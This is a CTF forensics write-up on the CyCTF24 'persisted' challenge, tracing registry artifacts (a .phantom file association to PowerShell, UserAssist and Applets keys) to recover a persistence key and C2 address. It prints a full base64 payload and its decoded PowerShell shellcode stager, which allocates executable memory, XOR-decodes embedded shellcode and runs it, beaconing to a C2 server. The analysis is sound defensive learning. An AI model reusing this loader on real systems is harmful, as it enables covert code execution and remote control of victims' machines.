Hello Forensics Geeks, I’m Ahmed Nasser (OxAlpha) and this is a simple Write-Up about persisted challenge from cyshield CTF (CyCTF24) enjoy…
You Can Download Challenge Files From here .
- We ware Provided with 6 Registry Hives :
- then i opened them with registry explorer
- First i checked RecentDocs key and found some suspicious file names usnder :
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs
Phantom Files, also known as Hidden Game Files, are files that are purposely hidden or improperly titled by Rockstar Games, intended to disguise and hide myths from those viewing on their PC
- Then i used find tool to share about keyword “phantom” and got some hits :
Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.phantom\OpenWithProgids
- Then i checked the key i found that, phantom files is set to be opened with powershell 🤨🤨
Forensic Implications
If this association wasn’t intentionally configured, it could be a red flag indicating possible malicious behavior:
Automated Execution: Files with the .phantom extension could potentially trigger unwanted PowerShell commands.
Persistence Mechanism: This association could serve as a persistence mechanism for malware, ensuring that files with certain extensions trigger PowerShell.
- so i got the Reg key and file name :
KEY: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.phantom\OpenWithList
FileName: 1223.phantom
- Then i started to search about any attacker C2 IP and there are 2 method to get it :
First Method (Very easyyyyyyyyyyyyyy)
i was 100% sure it will be in encoded malicious payload (base64 , yep i just know it )
- so i used find tool to extract any base64 encoded payloads :
- this base64 payload found under :
HKCU\Software\Microsoft\GameApi
Second Method
- First i checked UserAssist key , and found that the attacker opened sticky notes 11 times.
The UserAssist key in the Windows Registry tracks user activity, specifically applications or files that have been accessed through the Windows GUI. It is commonly used in forensic investigations to gain insights into a user’s recent interactions with applications on a system.
The UserAssist keys are found under:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist
- so i went there to see what’s going on.
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets
- So i known that the attacker edited this Reg Key , so i went there to see what’s going on.
- Nice I get it 🙃 Let’s decode :
UwBlAHQALQBTAHQAcgBpAGMAdABNAG8AZABlACAALQBWAGUAcgBzAGkAbwBuACAAMgANAAoADQAKAGYAdQBuAGMAdABpAG8AbgAgAGYAdQBuAGMAXwBnAGUAdABfAHAAcgBvAGMAXwBhAGQAZAByAGUAcwBzACAAewANAAoACQBQAGEAcgBhAG0AIAAoACQAdgBhAHIAXwBtAG8AZAB1AGwAZQAsACAAJAB2AGEAcgBfAHAAcgBvAGMAZQBkAHUAcgBlACkACQAJAA0ACgAJACQAdgBhAHIAXwB1AG4AcwBhAGYAZQBfAG4AYQB0AGkAdgBlAF8AbQBlAHQAaABvAGQAcwAgAD0AIAAoAFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEcAZQB0AEEAcwBzAGUAbQBiAGwAaQBlAHMAKAApACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAEcAbABvAGIAYQBsAEEAcwBzAGUAbQBiAGwAeQBDAGEAYwBoAGUAIAAtAEEAbgBkACAAJABfAC4ATABvAGMAYQB0AGkAbwBuAC4AUwBwAGwAaQB0ACgAJwBcAFwAJwApAFsALQAxAF0ALgBFAHEAdQBhAGwAcwAoACcAUwB5AHMAdABlAG0ALgBkAGwAbAAnACkAIAB9ACkALgBHAGUAdABUAHkAcABlACgAJwBNAGkAYwByAG8AcwBvAGYAdAAuAFcAaQBuADMAMgAuAFUAbgBzAGEAZgBlAE4AYQB0AGkAdgBlAE0AZQB0AGgAbwBkAHMAJwApAA0ACgAJACQAdgBhAHIAXwBnAHAAYQAgAD0AIAAkAHYAYQByAF8AdQBuAHMAYQBmAGUAXwBuAGEAdABpAHYAZQBfAG0AZQB0AGgAbwBkAHMALgBHAGUAdABNAGUAdABoAG8AZAAoACcARwBlAHQAUAByAG8AYwBBAGQAZAByAGUAcwBzACcALAAgAFsAVAB5AHAAZQBbAF0AXQAgAEAAKAAnAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzAC4ASABhAG4AZABsAGUAUgBlAGYAJwAsACAAJwBzAHQAcgBpAG4AZwAnACkAKQANAAoACQByAGUAdAB1AHIAbgAgACQAdgBhAHIAXwBnAHAAYQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABAACgAWwBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwAuAEgAYQBuAGQAbABlAFIAZQBmAF0AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBIAGEAbgBkAGwAZQBSAGUAZgAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkAbgB0AFAAdAByACkALAAgACgAJAB2AGEAcgBfAHUAbgBzAGEAZgBlAF8AbgBhAHQAaQB2AGUAXwBtAGUAdABoAG8AZABzAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAEcAZQB0AE0AbwBkAHUAbABlAEgAYQBuAGQAbABlACcAKQApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAEAAKAAkAHYAYQByAF8AbQBvAGQAdQBsAGUAKQApACkAKQAsACAAJAB2AGEAcgBfAHAAcgBvAGMAZQBkAHUAcgBlACkAKQANAAoAfQANAAoADQAKAGYAdQBuAGMAdABpAG8AbgAgAGYAdQBuAGMAXwBnAGUAdABfAGQAZQBsAGUAZwBhAHQAZQBfAHQAeQBwAGUAIAB7AA0ACgAJAFAAYQByAGEAbQAgACgADQAKAAkACQBbAFAAYQByAGEAbQBlAHQAZQByACgAUABvAHMAaQB0AGkAbwBuACAAPQAgADAALAAgAE0AYQBuAGQAYQB0AG8AcgB5ACAAPQAgACQAVAByAHUAZQApAF0AIABbAFQAeQBwAGUAWwBdAF0AIAAkAHYAYQByAF8AcABhAHIAYQBtAGUAdABlAHIAcwAsAA0ACgAJAAkAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAFAAbwBzAGkAdABpAG8AbgAgAD0AIAAxACkAXQAgAFsAVAB5AHAAZQBdACAAJAB2AGEAcgBfAHIAZQB0AHUAcgBuAF8AdAB5AHAAZQAgAD0AIABbAFYAbwBpAGQAXQANAAoACQApAA0ACgANAAoACQAkAHYAYQByAF8AdAB5AHAAZQBfAGIAdQBpAGwAZABlAHIAIAA9ACAAWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ARABlAGYAaQBuAGUARAB5AG4AYQBtAGkAYwBBAHMAcwBlAG0AYgBsAHkAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAoACcAUgBlAGYAbABlAGMAdABlAGQARABlAGwAZQBnAGEAdABlACcAKQApACwAIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEUAbQBpAHQALgBBAHMAcwBlAG0AYgBsAHkAQgB1AGkAbABkAGUAcgBBAGMAYwBlAHMAcwBdADoAOgBSAHUAbgApAC4ARABlAGYAaQBuAGUARAB5AG4AYQBtAGkAYwBNAG8AZAB1AGwAZQAoACcASQBuAE0AZQBtAG8AcgB5AE0AbwBkAHUAbABlACcALAAgACQAZgBhAGwAcwBlACkALgBEAGUAZgBpAG4AZQBUAHkAcABlACgAJwBNAHkARABlAGwAZQBnAGEAdABlAFQAeQBwAGUAJwAsACAAJwBDAGwAYQBzAHMALAAgAFAAdQBiAGwAaQBjACwAIABTAGUAYQBsAGUAZAAsACAAQQBuAHMAaQBDAGwAYQBzAHMALAAgAEEAdQB0AG8AQwBsAGEAcwBzACcALAAgAFsAUwB5AHMAdABlAG0ALgBNAHUAbAB0AGkAYwBhAHMAdABEAGUAbABlAGcAYQB0AGUAXQApAA0ACgAJACQAdgBhAHIAXwB0AHkAcABlAF8AYgB1AGkAbABkAGUAcgAuAEQAZQBmAGkAbgBlAEMAbwBuAHMAdAByAHUAYwB0AG8AcgAoACcAUgBUAFMAcABlAGMAaQBhAGwATgBhAG0AZQAsACAASABpAGQAZQBCAHkAUwBpAGcALAAgAFAAdQBiAGwAaQBjACcALAAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQwBhAGwAbABpAG4AZwBDAG8AbgB2AGUAbgB0AGkAbwBuAHMAXQA6ADoAUwB0AGEAbgBkAGEAcgBkACwAIAAkAHYAYQByAF8AcABhAHIAYQBtAGUAdABlAHIAcwApAC4AUwBlAHQASQBtAHAAbABlAG0AZQBuAHQAYQB0AGkAbwBuAEYAbABhAGcAcwAoACcAUgB1AG4AdABpAG0AZQAsACAATQBhAG4AYQBnAGUAZAAnACkADQAKAAkAJAB2AGEAcgBfAHQAeQBwAGUAXwBiAHUAaQBsAGQAZQByAC4ARABlAGYAaQBuAGUATQBlAHQAaABvAGQAKAAnAEkAbgB2AG8AawBlACcALAAgACcAUAB1AGIAbABpAGMALAAgAEgAaQBkAGUAQgB5AFMAaQBnACwAIABOAGUAdwBTAGwAbwB0ACwAIABWAGkAcgB0AHUAYQBsACcALAAgACQAdgBhAHIAXwByAGUAdAB1AHIAbgBfAHQAeQBwAGUALAAgACQAdgBhAHIAXwBwAGEAcgBhAG0AZQB0AGUAcgBzACkALgBTAGUAdABJAG0AcABsAGUAbQBlAG4AdABhAHQAaQBvAG4ARgBsAGEAZwBzACgAJwBSAHUAbgB0AGkAbQBlACwAIABNAGEAbgBhAGcAZQBkACcAKQANAAoADQAKAAkAcgBlAHQAdQByAG4AIAAkAHYAYQByAF8AdAB5AHAAZQBfAGIAdQBpAGwAZABlAHIALgBDAHIAZQBhAHQAZQBUAHkAcABlACgAKQANAAoAfQANAAoADQAKAEkAZgAgACgAWwBJAG4AdABQAHQAcgBdADoAOgBzAGkAegBlACAALQBlAHEAIAA4ACkAIAB7AA0ACgAJAFsAQgB5AHQAZQBbAF0AXQAkAHYAYQByAF8AYwBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwAzADIAdQBnAHgAOQBQAEwANgB5AE0AagBJADIASgB5AFkAbgBOAHgAYwBuAFYAcgBFAHYARgBHAGEANgBoAHgAUQAyAHUAbwBjAFQAdAByAHEASABFAEQAYQA2AGgAUgBjADIAcwBzAGwARwBsAHAAYgBoAEwAcQBhAHgATABqAGoAeAA5AEMAWAB5AEUAUABBADIATABpADYAaQA1AGkASQB1AEwAQgB6AG4ARgBpAGMAbQB1AG8AYwBRAE8AbwBZAFIAOQByAEkAdgBOAEYAbwBsAHMANwBLAEMARgBXAFUAYQBpAGoAcQB5AE0AagBJADIAdQBtADQAMQBkAEUAYQB5AEwAegBjADYAaAByAE8AMgBlAG8AWQB3AE4AcQBJAHYAUABBAGQAVwB2AGMANgBtAEsAbwBGADYAdAByAEkAdgBWAHUARQB1AHAAcgBFAHUATwBQAFkAdQBMAHEATABtAEkAaQA0AGgAdgBEAFYAdABKAHYASQBHADgASABLADIAWQBhADgAbABiADcAZQAyAGUAbwBZAHcAZABxAEkAdgBOAEYAWQBxAGcAdgBhADIAZQBvAFkAegA5AHEASQB2AE4AaQBxAEMAZQByAGEAeQBMAHoAWQBuAHQAaQBlADMAMQA2AGUAVwBKADcAWQBuAHAAaQBlAFcAdQBnAHoAdwBOAGkAYwBkAHoARABlADIASgA2AGUAVwB1AG8ATQBjAHAAcwAzAE4AegBjAGYAawBrAGoAYQBwADEAVQBTAGsAMQBLAFQAVQBaAFgASQAyAEoAMQBhAHEAcgBGAGIANgByAFMAWQBwAGwAdgBWAEEAVQBrADMAUABaAHIARQB1AHAAcgBFAHYARgB1AEUAdQBOAHUARQB1AHAAaQBjADIASgB6AFkAcABrAFoAZABWAHEARQAzAFAAYgBJAFUASABsAHIAcQB1AEoAaQBtADMATQBqAEkAeQBOAHUARQB1AHAAaQBjAG0ASgB5AFMAUwBCAGkAYwBtAEsAWgBkAEsAcQA4ADUAZAB6ADIAeQBIAHAANABhADYAcgBpAGEAeABMAHgAYQBxAHIANwBiAGgATABxAGMAVQBzAGoASQBXAE8AbgBjAFgARgBpAG0AYwBoADIARABSAGoAYwA5AG0AdQBxADUAVwB1AGcANABIAE4ASgBLAFgAeAByAHEAdABKAHIAcQB2AGwAcQA1AE8AUABjADMATgB6AGMAYgBoAEwAcQBjAFgARgBpAG0AUQA0AGwATwAxAGoAYwA5AHEAYgBqAEwASwBhACsASQBpAE0AagBhADkAegBzAEwASwBlAHYASQBpAE0AagB5AFAARABLAHgAeQBJAGoASQA4AHUAQgAzAE4AegBjAEQARwBoAFAAUgBtAEkAagA5AHMASgA2AGMAagBrAGQAZQBLAE4ARAAyAHoAVwBlADAAMgAyAHYAdABGAHcAZgBFAGoAVwAzAFgAMQBIAGkAUgBRAHkATwBxAEUAaQA2AFcATABiAEEAVgBOAGEAMABZAHoARABtAHIASQArAHYAWAA4ADQAWABZAEgANwBSAC8AaQBBAHEARAByAFgAQQBEAHEALwBNAFgAbwB4AGUAMAA4AEcASwBNAEQAZQB2ACsAVgA4ADMANwA0ADkAQQA1AGkATgAyAFUARQBaAFIARABtAEoARQBSAGsAMQBYAEcAUQBOAHUAVABGAGwASwBUADAAOQBDAEQAQgBZAE4ARQB3AE0ATABRAEUAeABPAFUAMABKAFgAUwBrAEYAUABSAGgAZwBEAGIAbgBCAHEAWgBnAE0AYQBEAFIATQBZAEEAMwBSAEsAVABVAGQATQBWAEYAQQBEAGIAWABjAEQARgBRADAAUwBHAEEATgAzAFUAVQBwAEgAUgBrADEAWABEAEIAWQBOAEUAeABnAEQAZQAwAEYATQBXAHcAbwB1AEsAUwBOAHkAWgB0AHIAMQBCAGIAbQBaAFgAQgB3AGYAdgBUAEYANAB6AHkAeABWAEEAWABWADYANQB3AEkAWABEAGoARABKAGcAcABiAC8AbAB0AEwAbQB6AHoATgByAEIAVQAzADEAUwBoAGYALwBMADAAQgB6AEcATgBrAFMAWABLAGoAaAAvAHkAcgBVAE4ARQBtAGEASQB6AFEANgA5AHQAVwBXADEARgBsAGIATQB0AHIAOABlAGIAdgBhAEoAYQBhAG8AeABKAC8AagBkAEwANQBBAHkAbgB0AGsAUwBkAFkAMQBjAHkAMwBPADEAYwBVAHcAcwBWAFQATgB5AE8ARwBuAFIAYwAzAHgAbABEAFUAcwA2AFEAMQB1AE0AMABsAGMAcgBmAHUAQgBNAE8AdwBnAGgAcABKADcANwBHAEUAQgBjAEgAcABqAGoAYQA3AE4ARQBZAFEANwB2AGoAQwBaAGsAbAB0AFQAMQArAFcAVQBLAHoAYgB2ADUARQB5AGUAUgB1AG0AMwA5AGYASwBMAHcAOABBAG4AaABVADQAYgBxAHAAbgBhADcAegBWAFEARABVADkAcAByAFcAOQBUAE4ANQA1AG4AWQBzAFcAUABSADQANgBOADgAVAB2AEYAaAB1AFUAdgBDAHYATQA5AGoAWQBLAFgAaABHAEYAcQBuAFcAMwBzAHEAWABHADAASABvAFEAQgBnAGcAMwAxAGYAWABqAG8AawBUAHYAVQBWAFMAegBpAHMAaABwAFYAegBSAGsAagBZAHAAMwBUAGwAbwBGADEAMwBQAFoAcgBFAHUAcQBaAEkAeQBOAGoASQAyAEsAYgBJAHoATQBqAEkAMgBLAGEAWQB5AE0AagBJADIASwBaAGUANABkAHcAeAB0AHoAMgBhADcAQgB3AGMARwB1AHEAeABHAHUAcQAwAG0AdQBxACsAVwBLAGIASQB3AE0AagBJADIAcQBxADIAbQBLAFoATQBiAFcAcQB3AGQAegAyAGEANgBEAG4AQQA2AGIAagBWADUAVgBGAHEAQwBSAHIASQB1AEMAbQA0ADEAYgAwAGUAMwB0ADcAYQB5AFkAagBJAHkATQBqAGMAKwBEAEwAdgBOADcAYwAzAEIASQBhAEUAUQAwAFMARgBSAHMATgBFAGgASQBWAEQAUgBJAFIARwBpAE0AWgAvAFUAdQBTACcAKQANAAoADQAKAAkAZgBvAHIAIAAoACQAeAAgAD0AIAAwADsAIAAkAHgAIAAtAGwAdAAgACQAdgBhAHIAXwBjAG8AZABlAC4AQwBvAHUAbgB0ADsAIAAkAHgAKwArACkAIAB7AA0ACgAJAAkAJAB2AGEAcgBfAGMAbwBkAGUAWwAkAHgAXQAgAD0AIAAkAHYAYQByAF8AYwBvAGQAZQBbACQAeABdACAALQBiAHgAbwByACAAMwA1AA0ACgAJAH0ADQAKAA0ACgAJACQAdgBhAHIAXwB2AGEAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwAuAE0AYQByAHMAaABhAGwAXQA6ADoARwBlAHQARABlAGwAZQBnAGEAdABlAEYAbwByAEYAdQBuAGMAdABpAG8AbgBQAG8AaQBuAHQAZQByACgAKABmAHUAbgBjAF8AZwBlAHQAXwBwAHIAbwBjAF8AYQBkAGQAcgBlAHMAcwAgAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKQAsACAAKABmAHUAbgBjAF8AZwBlAHQAXwBkAGUAbABlAGcAYQB0AGUAXwB0AHkAcABlACAAQAAoAFsASQBuAHQAUAB0AHIAXQAsACAAWwBVAEkAbgB0ADMAMgBdACwAIABbAFUASQBuAHQAMwAyAF0ALAAgAFsAVQBJAG4AdAAzADIAXQApACAAKABbAEkAbgB0AFAAdAByAF0AKQApACkADQAKAAkAJAB2AGEAcgBfAGIAdQBmAGYAZQByACAAPQAgACQAdgBhAHIAXwB2AGEALgBJAG4AdgBvAGsAZQAoAFsASQBuAHQAUAB0AHIAXQA6ADoAWgBlAHIAbwAsACAAJAB2AGEAcgBfAGMAbwBkAGUALgBMAGUAbgBnAHQAaAAsACAAMAB4ADMAMAAwADAALAAgADAAeAA0ADAAKQANAAoACQBbAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAcwBoAGEAbABdADoAOgBDAG8AcAB5ACgAJAB2AGEAcgBfAGMAbwBkAGUALAAgADAALAAgACQAdgBhAHIAXwBiAHUAZgBmAGUAcgAsACAAJAB2AGEAcgBfAGMAbwBkAGUALgBsAGUAbgBnAHQAaAApAA0ACgANAAoACQAkAHYAYQByAF8AcgB1AG4AbQBlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEcAZQB0AEQAZQBsAGUAZwBhAHQAZQBGAG8AcgBGAHUAbgBjAHQAaQBvAG4AUABvAGkAbgB0AGUAcgAoACQAdgBhAHIAXwBiAHUAZgBmAGUAcgAsACAAKABmAHUAbgBjAF8AZwBlAHQAXwBkAGUAbABlAGcAYQB0AGUAXwB0AHkAcABlACAAQAAoAFsASQBuAHQAUAB0AHIAXQApACAAKABbAFYAbwBpAGQAXQApACkAKQANAAoACQAkAHYAYQByAF8AcgB1AG4AbQBlAC4ASQBuAHYAbwBrAGUAKABbAEkAbgB0AFAAdAByAF0AOgA6AFoAZQByAG8AKQANAAoAfQA=
Set-StrictMode -Version 2
function func_get_proc_address {
Param ($var_module, $var_procedure)
$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}
function func_get_delegate_type {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
[Parameter(Position = 1)] [Type] $var_return_type = [Void]
)
$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')
return $var_type_builder.CreateType()
}
If ([IntPtr]::size -eq 8) {
[Byte[]]$var_code = [System.Convert]::FromBase64String('32ugx9PL6yMjI2JyYnNxcnVrEvFGa6hxQ2uocTtrqHEDa6hRc2sslGlpbhLqaxLjjx9CXyEPA2Li6i5iIuLBznFicmuocQOoYR9rIvNFols7KCFWUaijqyMjI2um41dEayLzc6hrO2eoYwNqIvPAdWvc6mKoF6trIvVuEuprEuOPYuLqLmIi4hvDVtJvIG8HK2Ya8lb7e2eoYwdqIvNFYqgva2eoYz9qIvNiqCerayLzYntie316eWJ7YnpieWugzwNicdzDe2J6eWuoMcps3Nzcfkkjap1USk1KTUZXI2J1aqrFb6rSYplvVAUk3PZrEuprEvFuEuNuEupic2JzYpkZdVqE3PbIUHlrquJim3MjIyNuEupicmJySSBicmKZdKq85dz2yHp4a6riaxLxaqr7bhLqcUsjIWOncXFimch2DRjc9muq5Wug4HNJKXxrqtJrqvlq5OPc3NzcbhLqcXFimQ4lO1jc9qbjLKa+IiMja9zsLKevIiMjyPDKxyIjI8uB3NzcDGhPRmIj9sJ6cjkdeKND2zWe022vtFwfEjW3X1HiRQyOqEi6WLbAVNa0YzDmrI+vX84XYH7R/iAqDrXADq/MXoxe08GKMDev+V83749A5iN2UEZRDmJERk1XGQNuTFlKT09CDBYNEwMLQExOU0JXSkFPRhgDbnBqZgMaDRMYA3RKTUdMVFADbXcDFQ0SGAN3UUpHRk1XDBYNExgDe0FMWwouKSNyZtr1BbmZXBwfvTF4zyxVAXV65wIXDjDJgpb/ltLmzzNrBU31Shf/L0BzGNkSXKjh/yrUNEmaIzQ69tWW1FlbMtr8ebvaJaaoxJ/jdL5AyntkSdY1cy3O1cUwsVTNyOGnRc3xlDUs6Q1uM0lcrfuBMOwghpJ77GEBcHpjja7NEYQ7vjCZkltT1+WUKzbv5EyeRum39fKLw8AnhU4bqpna7zVQDU9prW9TN55nYsWPR46N8TvFhuUvCvM9jYKXhGFqnW3sqXG0HoQBgg31fXjokTvUVSzishpVzRkjYp3TloF13PZrEuqZIyNjI2KbIzMjI2KaYyMjI2KZe4dwxtz2a7BwcGuqxGuq0muq+WKbIwMjI2qq2mKZMbWqwdz2a6DnA6bjV5VFqCRrIuCm41b0e3t7ayYjIyMjc+DLvN7c3BIaEQ0SFRsNEhIVDRIRGiMZ/UuS')
for ($x = 0; $x -lt $var_code.Count; $x++) {
$var_code[$x] = $var_code[$x] -bxor 35
}
$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)
$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
}
- so I saved this powershell script and upload it to Virus Total
{"C2Server": "http://192.168.116.129:80/KleA", "User Agent": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; Xbox)\r\n"}
So the Final flag is :
CyCTF{HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.phantom\OpenWithList:1223.phantom:192.168.116.129:80}